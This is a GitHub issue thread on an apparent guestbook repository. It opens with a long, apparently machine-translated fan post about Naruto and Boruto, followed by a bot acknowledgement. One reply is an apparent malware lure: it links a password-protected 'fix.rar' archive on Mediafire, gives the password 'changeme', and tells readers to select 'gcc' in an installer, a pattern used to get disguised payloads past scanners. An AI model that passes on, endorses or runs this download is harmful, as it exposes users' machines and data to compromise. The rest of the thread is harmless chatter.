### ISSUE TITLE
Sorry I dragged Agree to show you this..

### ISSUE THREAD

**Issue by Indigochi1d** [kokodak/kokodak#15]
Naruto Sasket, is this real? It is a real battle between the world's greatest powers. Are you sure it's that stupid Naruto? The real Naruto is a legend.When I saw Naruto a long time ago, I always saw him as a king-like creature, Hocca, and became the most legendary hero in the world, I was so touched by the scenes that made me emotional and touched my heart by the scenes from Naruto's songs to the best scenes went through my mind. And in the movie version, Sasuke, the giant meteorite flying in front of KaKashi, suddenly appeared and broke it down and said, "If there is no Naruto, I'm the only one who can protect the village." The scene that disappeared like the wind, I couldn't help but cry if someone had seen it from the beginning. I am so touched and I recently found out about Boruto. I am sorry. I was watching the 20th episode, and I was so moved to see the generation of Naruto, and it was all so big that I was confused about all the memories I had. I think he's become talkative He's a good teacher. And why are you cursing at Boruto? He is cute, but he looks like Naruto. We have similar personalities. And is it true that even if two Narutosaskets fight in Boruto, there is a godlike existence that wins? And I searched it on the internet. Is this real fact? Is that a new monster from Boruto?Look at the combination of Narutosasuke. I was so shocked by this. Wow, that sound came out of itself. If that's true, you have to watch it. It doesn't destroy the real world. Wow, I was about to cry to see Naruto Sasket become like that. I keep looking at it. Is that...? I want to see Sasuke. When did I become the best in the new class like this? I remember my middle school days and I am sad and happy and moved and various emotions are complicated. Anyway, Naruto is the best animation ever.

**Comment by kokodak** [comment]
Hi! This is kokodak Bot. Please wait a moment, your guestbook comment is being registered.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Indigochi1d** [comment]
ㅠㅠ
